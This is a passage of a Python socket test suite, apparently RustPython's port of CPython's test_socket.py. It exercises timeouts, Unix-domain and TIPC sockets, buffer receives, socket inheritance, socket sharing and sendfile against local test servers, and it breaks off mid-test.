            socket.setdefaulttimeout(None)
        self.assertEqual(self.cli.gettimeout(), 42)

    testTimeoutNone = _justAccept
    def _testTimeoutNone(self):
        # None timeout means the same as sock.settimeout(None)
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            self.cli = socket.create_connection((HOST, self.port), timeout=None)
            self.addCleanup(self.cli.close)
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(self.cli.gettimeout(), None)

    testTimeoutValueNamed = _justAccept
    def _testTimeoutValueNamed(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30)
        # Fix: register cleanup like every sibling test does, so the
        # socket is closed even if the assertion below fails.
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.gettimeout(), 30)

    testTimeoutValueNonamed = _justAccept
    def _testTimeoutValueNonamed(self):
        self.cli = socket.create_connection((HOST, self.port), 30)
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
    # Timeout behaviour of sockets returned by create_connection().
    # test* methods run server-side; the paired _test* methods run in the
    # client thread (ThreadableTest pairs them by name).

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)

    def testInsideTimeout(self):
        # Server: accept, stall for 3 seconds, then send.  The client
        # either waits it out (no timeout) or times out first (timeout=1).
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        time.sleep(3)
        conn.send(b"done!")
    testOutsideTimeout = testInsideTimeout

    def _testInsideTimeout(self):
        # No timeout: recv() blocks until the server's delayed send.
        self.cli = sock = socket.create_connection((HOST, self.port))
        data = sock.recv(5)
        self.assertEqual(data, b"done!")

    def _testOutsideTimeout(self):
        # 1s timeout expires before the server's 3s sleep finishes.
        self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
        self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
    # Timeout behaviour of a listening TCP socket.

    def testTCPTimeout(self):
        # accept() with a 1s timeout and no client must raise socket.timeout.
        def raise_timeout(*args, **kwargs):
            self.serv.settimeout(1.0)
            self.serv.accept()
        self.assertRaises(socket.timeout, raise_timeout,
                          "Error generating a timeout exception (TCP)")

    def testTimeoutZero(self):
        # settimeout(0.0) means non-blocking: accept() with no pending
        # connection must raise a plain OSError, never socket.timeout.
        ok = False
        try:
            self.serv.settimeout(0.0)
            foo = self.serv.accept()
        except socket.timeout:
            self.fail("caught timeout instead of error (TCP)")
        except OSError:
            ok = True
        except:
            self.fail("caught unexpected exception (TCP)")
        if not ok:
            self.fail("accept() returned success when we did not expect it")

    @unittest.skipUnless(hasattr(signal, 'alarm'),
                         'test needs signal.alarm()')
    def testInterruptedTimeout(self):
        # XXX I don't know how to do this test on MSWindows or any other
        # platform that doesn't support signal.alarm() or os.kill(), though
        # the bug should have existed on all platforms.
        self.serv.settimeout(5.0)   # must be longer than alarm

        class Alarm(Exception):
            pass

        def alarm_handler(signal, frame):
            raise Alarm

        old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
        try:
            try:
                signal.alarm(2)    # POSIX allows alarm to be up to 1 second early
                foo = self.serv.accept()
            except socket.timeout:
                # The SIGALRM must interrupt accept(); seeing the socket
                # timeout instead means the signal was swallowed.
                self.fail("caught timeout instead of Alarm")
            except Alarm:
                pass
            except:
                self.fail("caught other exception instead of Alarm:"
                          " %s(%s):\n%s" %
                          (sys.exc_info()[:2] + (traceback.format_exc(),)))
            else:
                self.fail("nothing caught")
            finally:
                signal.alarm(0)         # shut off alarm
        except Alarm:
            self.fail("got Alarm in wrong place")
        finally:
            # no alarm can be pending.  Safe to restore old handler.
            signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
    """Timeout behaviour of a UDP socket (mirrors TCPTimeoutTest)."""

    def testUDPTimeout(self):
        # recv() with a 1s timeout and no sender must raise socket.timeout.
        def recv_with_timeout(*args, **kwargs):
            self.serv.settimeout(1.0)
            self.serv.recv(1024)
        self.assertRaises(socket.timeout, recv_with_timeout,
                          "Error generating a timeout exception (UDP)")

    def testTimeoutZero(self):
        # A zero timeout is non-blocking mode: recv() with nothing queued
        # must raise a plain OSError, not socket.timeout.
        got_oserror = False
        try:
            self.serv.settimeout(0.0)
            _ = self.serv.recv(1024)
        except socket.timeout:
            self.fail("caught timeout instead of error (UDP)")
        except OSError:
            got_oserror = True
        except:
            self.fail("caught unexpected exception (UDP)")
        if not got_oserror:
            self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
    """Exception hierarchy and error behaviour of the socket module."""

    def testExceptionTree(self):
        # Every socket-specific exception must descend from OSError.
        for exc in (socket.herror, socket.gaierror, socket.timeout):
            self.assertTrue(issubclass(exc, OSError))
        self.assertTrue(issubclass(OSError, Exception))

    def test_setblocking_invalidfd(self):
        # Regression test for issue #28471
        sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        sock = socket.socket(
            socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
        sock0.close()
        self.addCleanup(sock.detach)
        # The fd was closed via sock0, so operating on it must fail.
        with self.assertRaises(OSError):
            sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
    # AF_UNIX names beginning with NUL live in the Linux-only "abstract
    # namespace": no filesystem entry is created for them.

    UNIX_PATH_MAX = 108  # longest address these tests accept (presumably sizeof(sun_path) — confirm)

    def testLinuxAbstractNamespace(self):
        # Full connect/accept round trip over an abstract address.
        address = b"\x00python-test-hello\x00\xff"
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
            s1.bind(address)
            s1.listen()
            with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
                s2.connect(s1.getsockname())
                with s1.accept()[0] as s3:
                    self.assertEqual(s1.getsockname(), address)
                    self.assertEqual(s2.getpeername(), address)

    def testMaxName(self):
        # A name of exactly UNIX_PATH_MAX bytes (incl. leading NUL) binds.
        address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            s.bind(address)
            self.assertEqual(s.getsockname(), address)

    def testNameOverflow(self):
        # One byte longer than UNIX_PATH_MAX must be rejected.
        address = "\x00" + "h" * self.UNIX_PATH_MAX
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            self.assertRaises(OSError, s.bind, address)

    def testStrName(self):
        # Check that an abstract name can be passed as a string.
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            s.bind("\x00python\x00test\x00")
            self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
        finally:
            s.close()

    def testBytearrayName(self):
        # Check that an abstract name can be passed as a bytearray.
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            s.bind(bytearray(b"\x00python\x00test\x00"))
            self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
    # Binding AF_UNIX sockets to filesystem pathnames supplied in various
    # forms: str, bytes, surrogateescape-decoded str, unencodable str.

    def setUp(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

    def tearDown(self):
        self.sock.close()

    def encoded(self, path):
        # Return the given path encoded in the file system encoding,
        # or skip the test if this is not possible.
        try:
            return os.fsencode(path)
        except UnicodeEncodeError:
            self.skipTest(
                "Pathname {0!a} cannot be represented in file "
                "system encoding {1!r}".format(
                    path, sys.getfilesystemencoding()))

    def bind(self, sock, path):
        # Bind the socket, skipping (not failing) when the pathname is
        # longer than the platform's AF_UNIX limit.
        try:
            support.bind_unix_socket(sock, path)
        except OSError as e:
            if str(e) == "AF_UNIX path too long":
                self.skipTest(
                    "Pathname {0!a} is too long to serve as an AF_UNIX path"
                    .format(path))
            else:
                raise

    def testUnbound(self):
        # Issue #30205 (note getsockname() can return None on OS X)
        self.assertIn(self.sock.getsockname(), ('', None))

    def testStrAddr(self):
        # Test binding to and retrieving a normal string pathname.
        path = os.path.abspath(support.TESTFN)
        self.bind(self.sock, path)
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testBytesAddr(self):
        # Test binding to a bytes pathname.
        path = os.path.abspath(support.TESTFN)
        self.bind(self.sock, self.encoded(path))
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    # TODO: RUSTPYTHON, surrogateescape
    @unittest.expectedFailure
    def testSurrogateescapeBind(self):
        # Test binding to a valid non-ASCII pathname, with the
        # non-ASCII bytes supplied using surrogateescape encoding.
        path = os.path.abspath(support.TESTFN_UNICODE)
        b = self.encoded(path)
        self.bind(self.sock, b.decode("ascii", "surrogateescape"))
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testUnencodableAddr(self):
        # Test binding to a pathname that cannot be encoded in the
        # file system encoding.
        if support.TESTFN_UNENCODABLE is None:
            self.skipTest("No unencodable filename available")
        path = os.path.abspath(support.TESTFN_UNENCODABLE)
        self.bind(self.sock, path)
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
    """
    Test the buffer versions of socket.recv() and socket.send().
    """
    # Thread-paired suite: the _test* halves run in the client thread and
    # send MSG; the test* halves receive it into various writable buffer
    # types.  The `_testX = _testY` aliases reuse one sender per receiver.

    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def testRecvIntoArray(self):
        buf = array.array("B", [0] * len(MSG))
        nbytes = self.cli_conn.recv_into(buf)
        self.assertEqual(nbytes, len(MSG))
        buf = buf.tobytes()
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    def _testRecvIntoArray(self):
        buf = bytes(MSG)
        self.serv_conn.send(buf)

    def testRecvIntoBytearray(self):
        buf = bytearray(1024)
        nbytes = self.cli_conn.recv_into(buf)
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvIntoBytearray = _testRecvIntoArray

    def testRecvIntoMemoryview(self):
        buf = bytearray(1024)
        nbytes = self.cli_conn.recv_into(memoryview(buf))
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvIntoMemoryview = _testRecvIntoArray

    def testRecvFromIntoArray(self):
        buf = array.array("B", [0] * len(MSG))
        nbytes, addr = self.cli_conn.recvfrom_into(buf)
        self.assertEqual(nbytes, len(MSG))
        buf = buf.tobytes()
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    def _testRecvFromIntoArray(self):
        buf = bytes(MSG)
        self.serv_conn.send(buf)

    def testRecvFromIntoBytearray(self):
        buf = bytearray(1024)
        nbytes, addr = self.cli_conn.recvfrom_into(buf)
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvFromIntoBytearray = _testRecvFromIntoArray

    def testRecvFromIntoMemoryview(self):
        buf = bytearray(1024)
        nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvFromIntoMemoryview = _testRecvFromIntoArray

    def testRecvFromIntoSmallBuffer(self):
        # See issue #20246: asking for more bytes than the buffer holds
        # must raise ValueError instead of overflowing.
        buf = bytearray(8)
        self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)

    def _testRecvFromIntoSmallBuffer(self):
        self.serv_conn.send(MSG)

    def testRecvFromIntoEmptyBuffer(self):
        # A zero-length buffer is legal (reads nothing).
        buf = bytearray()
        self.cli_conn.recvfrom_into(buf)
        self.cli_conn.recvfrom_into(buf, 0)
    _testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
# TIPC name-sequence parameters shared by the TIPC tests below: a service
# type plus the lower/upper bounds of the published name range.
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
    """Check if the TIPC module is loaded

    The TIPC module is not loaded automatically on Ubuntu and probably
    other Linux distros.
    """
    if not hasattr(socket, "AF_TIPC"):
        return False
    try:
        modules = open("/proc/modules")
    except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory or if we
        # have not the permission to read it.
        return False
    with modules:
        # Loaded kernel modules are listed one per line, name first.
        return any(line.startswith("tipc ") for line in modules)
@unittest.skipUnless(isTipcAvailable(),
                     "TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
    def testRDM(self):
        # Reliable-datagram round trip: publish a name sequence, send to
        # an address in the middle of the published range, and expect the
        # message to arrive intact with the sender's address.
        srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
        cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
        self.addCleanup(srv.close)
        self.addCleanup(cli.close)

        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
                   TIPC_LOWER, TIPC_UPPER)
        srv.bind(srvaddr)

        sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
                    TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
        cli.sendto(MSG, sendaddr)

        msg, recvaddr = srv.recvfrom(1024)

        self.assertEqual(cli.getsockname(), recvaddr)
        self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
                     "TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
    # Stream-mode TIPC round trip, with the client in a second thread
    # (ThreadableTest pairs testStream with _testStream).

    def __init__(self, methodName = 'runTest'):
        unittest.TestCase.__init__(self, methodName = methodName)
        ThreadableTest.__init__(self)

    def setUp(self):
        self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
        self.addCleanup(self.srv.close)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
                   TIPC_LOWER, TIPC_UPPER)
        self.srv.bind(srvaddr)
        self.srv.listen()
        # Let the client thread proceed, then block in accept().
        self.serverExplicitReady()
        self.conn, self.connaddr = self.srv.accept()
        self.addCleanup(self.conn.close)

    def clientSetUp(self):
        # There is a hittable race between serverExplicitReady() and the
        # accept() call; sleep a little while to avoid it, otherwise
        # we could get an exception
        time.sleep(0.1)
        self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
        self.addCleanup(self.cli.close)
        addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
                TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
        self.cli.connect(addr)
        self.cliaddr = self.cli.getsockname()

    def testStream(self):
        # Server side: the received message and peer address must match
        # what the client sent / bound.
        msg = self.conn.recv(1024)
        self.assertEqual(msg, MSG)
        self.assertEqual(self.cliaddr, self.connaddr)

    def _testStream(self):
        self.cli.send(MSG)
        self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
    # Sockets as context managers: leaving the `with` block must close
    # the socket (observable via the private _closed flag).

    def _testSocketClass(self):
        # base test
        with socket.socket() as sock:
            self.assertFalse(sock._closed)
        self.assertTrue(sock._closed)
        # close inside with block
        with socket.socket() as sock:
            sock.close()
        self.assertTrue(sock._closed)
        # exception inside with block
        with socket.socket() as sock:
            self.assertRaises(OSError, sock.sendall, b'foo')
        self.assertTrue(sock._closed)

    def testCreateConnectionBase(self):
        # Server side: echo one payload back to the client.
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        data = conn.recv(1024)
        conn.sendall(data)

    def _testCreateConnectionBase(self):
        address = self.serv.getsockname()
        with socket.create_connection(address) as sock:
            self.assertFalse(sock._closed)
            sock.sendall(b'foo')
            self.assertEqual(sock.recv(1024), b'foo')
        self.assertTrue(sock._closed)

    def testCreateConnectionClose(self):
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        data = conn.recv(1024)
        conn.sendall(data)

    def _testCreateConnectionClose(self):
        # Closing inside the block, then exiting, must leave the socket
        # closed and unusable.
        address = self.serv.getsockname()
        with socket.create_connection(address) as sock:
            sock.close()
        self.assertTrue(sock._closed)
        self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
    """Sockets must be non-inheritable by default (PEP 446)."""

    @unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
                         "SOCK_CLOEXEC not defined")
    @support.requires_linux_version(2, 6, 28)
    def test_SOCK_CLOEXEC(self):
        with socket.socket(socket.AF_INET,
                           socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertFalse(s.get_inheritable())

    def test_default_inheritable(self):
        with socket.socket() as sock:
            self.assertEqual(sock.get_inheritable(), False)

    def test_dup(self):
        # A duplicated socket starts non-inheritable as well.
        with socket.socket() as sock:
            dup_sock = sock.dup()
            sock.close()
            with dup_sock:
                self.assertEqual(dup_sock.get_inheritable(), False)

    def test_set_inheritable(self):
        with socket.socket() as sock:
            sock.set_inheritable(True)
            self.assertEqual(sock.get_inheritable(), True)

            sock.set_inheritable(False)
            self.assertEqual(sock.get_inheritable(), False)

    @unittest.skipIf(fcntl is None, "need fcntl")
    def test_get_inheritable_cloexec(self):
        with socket.socket() as sock:
            fd = sock.fileno()
            self.assertEqual(sock.get_inheritable(), False)

            # Clearing FD_CLOEXEC behind the socket's back must be
            # reflected by get_inheritable().
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
            fcntl.fcntl(fd, fcntl.F_SETFD, flags & ~fcntl.FD_CLOEXEC)
            self.assertEqual(sock.get_inheritable(), True)

    @unittest.skipIf(fcntl is None, "need fcntl")
    def test_set_inheritable_cloexec(self):
        # set_inheritable() must toggle the underlying FD_CLOEXEC flag.
        with socket.socket() as sock:
            fd = sock.fileno()
            self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
                             fcntl.FD_CLOEXEC)

            sock.set_inheritable(True)
            self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
                             0)

    def test_socketpair(self):
        s1, s2 = socket.socketpair()
        self.addCleanup(s1.close)
        self.addCleanup(s2.close)
        for s in (s1, s2):
            self.assertEqual(s.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
                     "SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
    # Interaction of SOCK_NONBLOCK, setblocking()/settimeout() and the
    # kernel-level O_NONBLOCK flag.

    def checkNonblock(self, s, nonblock=True, timeout=0.0):
        # Assert that socket `s` is (or is not) in non-blocking mode both
        # at the Python level (gettimeout/getblocking) and at the fd
        # level (O_NONBLOCK via fcntl).
        if nonblock:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertEqual(s.gettimeout(), timeout)
            self.assertTrue(
                fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
            if timeout == 0:
                # timeout == 0: means that getblocking() must be False.
                self.assertFalse(s.getblocking())
            else:
                # If timeout > 0, the socket will be in a "blocking" mode
                # from the standpoint of the Python API.  For Python socket
                # object, "blocking" means that operations like 'sock.recv()'
                # will block.  Internally, file descriptors for
                # "blocking" Python sockets *with timeouts* are in a
                # *non-blocking* mode, and 'sock.recv()' uses 'select()'
                # and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
                self.assertTrue(s.getblocking())
        else:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertEqual(s.gettimeout(), None)
            self.assertFalse(
                fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
            self.assertTrue(s.getblocking())

    @support.requires_linux_version(2, 6, 28)
    def test_SOCK_NONBLOCK(self):
        # a lot of it seems silly and redundant, but I wanted to test that
        # changing back and forth worked ok
        with socket.socket(socket.AF_INET,
                           socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
            self.checkNonblock(s)
            s.setblocking(1)
            self.checkNonblock(s, nonblock=False)
            s.setblocking(0)
            self.checkNonblock(s)
            s.settimeout(None)
            self.checkNonblock(s, nonblock=False)
            s.settimeout(2.0)
            self.checkNonblock(s, timeout=2.0)
            s.setblocking(1)
            self.checkNonblock(s, nonblock=False)
        # defaulttimeout: the module-wide default must be picked up by
        # newly created sockets; restore the saved value at the end.
        t = socket.getdefaulttimeout()
        socket.setdefaulttimeout(0.0)
        with socket.socket() as s:
            self.checkNonblock(s)
        socket.setdefaulttimeout(None)
        with socket.socket() as s:
            self.checkNonblock(s, False)
        socket.setdefaulttimeout(2.0)
        with socket.socket() as s:
            self.checkNonblock(s, timeout=2.0)
        socket.setdefaulttimeout(None)
        with socket.socket() as s:
            self.checkNonblock(s, False)
        socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
@unittest.skip("TODO: RUSTPYTHON, socket sharing")
class TestSocketSharing(SocketTCPTest):
    # Windows-only socket.share()/socket.fromshare() (WSADuplicateSocket).
    # This must be classmethod and not staticmethod or multiprocessing
    # won't be able to bootstrap it.

    @classmethod
    def remoteProcessServer(cls, q):
        # Recreate socket from shared data
        sdata = q.get()
        message = q.get()

        s = socket.fromshare(sdata)
        s2, c = s.accept()

        # Send the message
        s2.sendall(message)
        s2.close()
        s.close()

    def testShare(self):
        # Transfer the listening server socket to another process
        # and service it from there.

        # Create process:
        q = multiprocessing.Queue()
        p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
        p.start()

        # Get the shared socket data
        data = self.serv.share(p.pid)

        # Pass the shared socket to the other process
        addr = self.serv.getsockname()
        self.serv.close()
        q.put(data)

        # The data that the server will send us
        message = b"slapmahfro"
        q.put(message)

        # Connect
        s = socket.create_connection(addr)

        #  listen for the data
        m = []
        while True:
            data = s.recv(100)
            if not data:
                break
            m.append(data)
        s.close()
        received = b"".join(m)
        self.assertEqual(received, message)
        p.join()

    def testShareLength(self):
        # Truncated or padded share blobs must be rejected.
        data = self.serv.share(os.getpid())
        self.assertRaises(ValueError, socket.fromshare, data[:-1])
        self.assertRaises(ValueError, socket.fromshare, data+b"foo")

    def compareSockets(self, org, other):
        # socket sharing is expected to work only for blocking socket
        # since the internal python timeout value isn't transferred.
        self.assertEqual(org.gettimeout(), None)
        self.assertEqual(org.gettimeout(), other.gettimeout())

        self.assertEqual(org.family, other.family)
        self.assertEqual(org.type, other.type)
        # If the user specified "0" for proto, then
        # internally windows will have picked the correct value.
        # Python introspection on the socket however will still return
        # 0.  For the shared socket, the python value is recreated
        # from the actual value, so it may not compare correctly.
        if org.proto != 0:
            self.assertEqual(org.proto, other.proto)

    def testShareLocal(self):
        # Sharing with our own pid round-trips the socket attributes.
        data = self.serv.share(os.getpid())
        s = socket.fromshare(data)
        try:
            self.compareSockets(self.serv, s)
        finally:
            s.close()

    def testTypes(self):
        # Every supported family/type combination must survive sharing.
        families = [socket.AF_INET, socket.AF_INET6]
        types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]

        for f in families:
            for t in types:
                try:
                    source = socket.socket(f, t)
                except OSError:
                    continue # This combination is not supported

                try:
                    data = source.share(os.getpid())
                    shared = socket.fromshare(data)
                    try:
                        self.compareSockets(source, shared)
                    finally:
                        shared.close()
                finally:
                    source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
    """
    Test the send() implementation of socket.sendfile().
    """
    # Thread-paired suite: the _test* halves run in the client thread and
    # push a prepared file through socket.sendfile(); the test* halves
    # receive and verify the stream server-side.  meth_from_sock() is the
    # hook the sendfile() subclass overrides to select the code path.

    FILESIZE = (10 * 1024 * 1024)  # 10 MiB
    BUFSIZE = 8192
    FILEDATA = b""
    TIMEOUT = 2

    @classmethod
    def setUpClass(cls):
        # Write FILESIZE bytes of random letters to support.TESTFN once
        # for the whole class, and keep a copy in memory for comparison.
        def chunks(total, step):
            assert total >= step
            while total > step:
                yield step
                total -= step
            if total:
                yield total

        chunk = b"".join([random.choice(string.ascii_letters).encode()
                          for i in range(cls.BUFSIZE)])
        with open(support.TESTFN, 'wb') as f:
            for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
                f.write(chunk)
        with open(support.TESTFN, 'rb') as f:
            cls.FILEDATA = f.read()
            assert len(cls.FILEDATA) == cls.FILESIZE

    @classmethod
    def tearDownClass(cls):
        support.unlink(support.TESTFN)

    def accept_conn(self):
        # Accept one client and bound its per-operation timeout.
        self.serv.settimeout(MAIN_TIMEOUT)
        conn, addr = self.serv.accept()
        conn.settimeout(self.TIMEOUT)
        self.addCleanup(conn.close)
        return conn

    def recv_data(self, conn):
        # Drain the connection until EOF and return everything received.
        received = []
        while True:
            chunk = conn.recv(self.BUFSIZE)
            if not chunk:
                break
            received.append(chunk)
        return b''.join(received)

    def meth_from_sock(self, sock):
        # Depending on the mixin class being run return either send()
        # or sendfile() method implementation.
        return getattr(sock, "_sendfile_use_send")

    # regular file
    def _testRegularFile(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, self.FILESIZE)
            self.assertEqual(file.tell(), self.FILESIZE)

    def testRegularFile(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # non regular file
    def _testNonRegularFile(self):
        # BytesIO has no fileno(); sendfile() must fall back to send(),
        # and the raw os.sendfile() path must refuse it.
        address = self.serv.getsockname()
        file = io.BytesIO(self.FILEDATA)
        with socket.create_connection(address) as sock, file as file:
            sent = sock.sendfile(file)
            self.assertEqual(sent, self.FILESIZE)
            self.assertEqual(file.tell(), self.FILESIZE)
            self.assertRaises(socket._GiveupOnSendfile,
                              sock._sendfile_use_sendfile, file)

    def testNonRegularFile(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # empty file
    def _testEmptyFileSend(self):
        address = self.serv.getsockname()
        filename = support.TESTFN + "2"
        with open(filename, 'wb'):
            self.addCleanup(support.unlink, filename)
        file = open(filename, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, 0)
            self.assertEqual(file.tell(), 0)

    def testEmptyFileSend(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(data, b"")

    # offset
    def _testOffset(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file, offset=5000)
            self.assertEqual(sent, self.FILESIZE - 5000)
            self.assertEqual(file.tell(), self.FILESIZE)

    def testOffset(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE - 5000)
        self.assertEqual(data, self.FILEDATA[5000:])

    # count
    def _testCount(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 5000007
            meth = self.meth_from_sock(sock)
            sent = meth(file, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count)

    @unittest.skipIf(sys.platform == "darwin", "TODO: RUSTPYTHON, killed (for OOM?)")
    def testCount(self):
        count = 5000007
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[:count])

    # count small
    def _testCountSmall(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 1
            meth = self.meth_from_sock(sock)
            sent = meth(file, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count)

    def testCountSmall(self):
        count = 1
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[:count])

    # count + offset
    def _testCountWithOffset(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 100007
            meth = self.meth_from_sock(sock)
            sent = meth(file, offset=2007, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count + 2007)

    def testCountWithOffset(self):
        count = 100007
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[2007:count+2007])

    # non blocking sockets are not supposed to work
    def _testNonBlocking(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            sock.setblocking(False)
            meth = self.meth_from_sock(sock)
            self.assertRaises(ValueError, meth, file)
            self.assertRaises(ValueError, sock.sendfile, file)

    def testNonBlocking(self):
        conn = self.accept_conn()
        if conn.recv(8192):
            self.fail('was not supposed to receive any data')

    # timeout (non-triggered)
    def _testWithTimeout(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
